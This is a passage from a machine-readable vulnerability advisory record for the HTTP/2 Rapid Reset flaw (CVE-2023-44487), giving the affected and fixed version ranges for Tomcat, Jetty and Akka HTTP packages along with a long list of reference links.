"pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.0.0", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.27", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.4.53" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.17" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.17" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.4.53" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.17" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.17" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:jetty-http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/jetty-http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.2" } ] } ], "versions": [ "12.0.0", "12.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:jetty-http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/jetty-http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.2" } ] } ], "versions": [ "12.0.0", "12.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "10.5.3" } ] } ], "versions": [ "3.0.0-RC1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core_2.13", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core_2.13" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "10.5.3" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.8", "10.1.9", "10.2.0", "10.2.0-M1", "10.2.0-RC1", "10.2.0-RC2", "10.2.1", "10.2.10", "10.2.2", "10.2.3", "10.2.4", "10.2.5", "10.2.5-M1", "10.2.5-M2", "10.2.6", "10.2.7", "10.2.8", "10.2.9", "10.4.0", "10.4.0-M1", "10.4.0-M2", "10.5.0", "10.5.0-M1", "10.5.1", "10.5.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core_2.12", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core_2.12" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "10.5.3" } ] } ], "versions": [ "10.0.0", "10.0.0-RC2", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.6+7-e2ba6752", "10.0.7", "10.0.8", "10.0.9", "10.1.0", "10.1.0-RC1", "10.1.0-RC2", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.3", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9", "10.2.0", "10.2.0-M1", "10.2.0-RC1", "10.2.0-RC2", "10.2.1", "10.2.10", "10.2.2", "10.2.3", "10.2.4", "10.2.5", "10.2.5-M1", "10.2.5-M2", "10.2.6", "10.2.7", "10.2.8", "10.2.9", "10.4.0", "10.4.0-M1", "10.4.0-M2", "10.5.0", "10.5.0-M1", "10.5.1", "10.5.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core_2.11", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core_2.11" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "10.1.15" } ] } ], "versions": [ "10.0.0", "10.0.0-RC2", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.6+7-e2ba6752", "10.0.7", "10.0.8", "10.0.9", "10.1.0", "10.1.0-RC1", "10.1.0-RC2", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.3", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9", "2.4-ARTERY-M1", "2.4-ARTERY-M2", "2.4-ARTERY-M3", "2.4-ARTERY-M4", "2.4.10", "2.4.11", "2.4.11.1", "2.4.11.2", "2.4.2", "2.4.2-RC1", "2.4.2-RC2", "2.4.2-RC3", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.4.7", "2.4.8", "2.4.9", "2.4.9-RC1", "2.4.9-RC2", "3.0.0-RC1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/apple/swift-nio-http2/security/advisories/GHSA-qppj-fm5r-hxr3" }, { "type": "WEB", "url": "https://github.com/h2o/h2o/security/advisories/GHSA-2m7v-gc89-fjqf" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44487" }, { "type": "WEB", "url": "https://github.com/caddyserver/caddy/issues/5877" }, { "type": "WEB", "url": "https://github.com/dotnet/announcements/issues/277" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/10679" }, { "type": "WEB", "url": "https://github.com/etcd-io/etcd/issues/16740" }, { "type": "WEB", "url": "https://github.com/apache/apisix/issues/10320" }, { "type": "WEB", "url": "https://github.com/alibaba/tengine/issues/1872" }, { "type": "WEB", "url": "https://github.com/akka/akka-http/issues/4323" }, { "type": "WEB", "url": "https://github.com/golang/go/issues/63417" }, { "type": "WEB", "url": "https://github.com/Azure/AKS/issues/3947" }, { "type": "WEB", "url": "https://github.com/varnishcache/varnish-cache/issues/3996" }, { "type": "WEB", "url": "https://github.com/haproxy/haproxy/issues/2312" }, { "type": "WEB", "url": "https://github.com/hyperium/hyper/issues/3337" }, { "type": "WEB", "url": "https://github.com/tempesta-tech/tempesta/issues/1986" }, { "type": "WEB", "url": "https://github.com/junkurihara/rust-rpxy/issues/97" }, { "type": "WEB", "url": "https://github.com/opensearch-project/data-prepper/issues/3474" }, { "type": "WEB", "url": "https://github.com/kazu-yamamoto/http2/issues/93" }, { "type": "WEB", "url": "https://github.com/openresty/openresty/issues/930" }, { "type": "WEB", "url": "https://github.com/ninenines/cowboy/issues/1615" }, { "type": "WEB", "url": "https://github.com/nodejs/node/pull/50121" }, { "type": "WEB", "url": "https://github.com/apache/trafficserver/pull/10564" }, { "type": "WEB", "url": "https://github.com/envoyproxy/envoy/pull/30055" }, { "type": "WEB", "url": "https://github.com/apache/httpd-site/pull/10" }, { "type": "WEB", "url": "https://github.com/nghttp2/nghttp2/pull/1961" }, { "type": "WEB", "url": "https://github.com/akka/akka-http/pull/4325" }, { "type": "WEB", "url": "https://github.com/akka/akka-http/pull/4324" }, { "type": "WEB", "url": "https://github.com/microsoft/CBL-Mariner/pull/6381" }, { "type": "WEB", "url": "https://github.com/facebook/proxygen/pull/466" }, { "type": "WEB", "url": "https://github.com/projectcontour/contour/pull/5826" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-go/pull/6703" }, { "type": "WEB", "url": "https://github.com/linkerd/website/pull/1695/commits/4b9c6836471bc8270ab48aae6fd2181bc73fd632" }, { "type": "WEB", "url": "https://github.com/line/armeria/pull/5232" }, { "type": "WEB", "url": "https://github.com/kubernetes/kubernetes/pull/121120" }, { "type": "WEB", "url": "https://github.com/h2o/h2o/pull/3291" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/58f75f665aa81a8cbcf6ffa74820042a285c5e61" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/944332bb15bd2f3bf76ec2caeb1ff0a58a3bc628" }, { "type": "WEB", "url": "https://github.com/kazu-yamamoto/http2/commit/f61d41a502bd0f60eb24e1ce14edc7b6df6722a1" }, { "type": "WEB", "url": "https://netty.io/news/2023/10/10/4-1-100-Final.html" }, { "type": "WEB", "url": "https://my.f5.com/manage/s/article/K000137106" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/cve-2023-44487" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4" }, { "type": "WEB", "url": "https://lists.w3.org/Archives/Public/ietf-http-wg/2023OctDec/0025.html" }, { "type": "WEB", "url": "https://mailman.nginx.org/pipermail/nginx-devel/2023-October/S36Q5HBXR7CAIMPLLPRSSSYR4PCMWILK.html" }, { "type": "WEB", "url": "https://martinthomson.github.io/h2-stream-limits/draft-thomson-httpbis-h2-stream-limits.html" }, { "type": "WEB", "url": "https://msrc.microsoft.com/blog/2023/10/microsoft-response-to-distributed-denial-of-service-ddos-attacks-against-http/2" }, { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-44487" }, { "type": "WEB", "url": "https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-44487" }, { "type": "WEB", "url": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487" }, { "type": "WEB", "url": "https://www.darkreading.com/cloud/internet-wide-zero-day-bug-fuels-largest-ever-ddos-event" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5540" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5549" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5558" }, { "type": 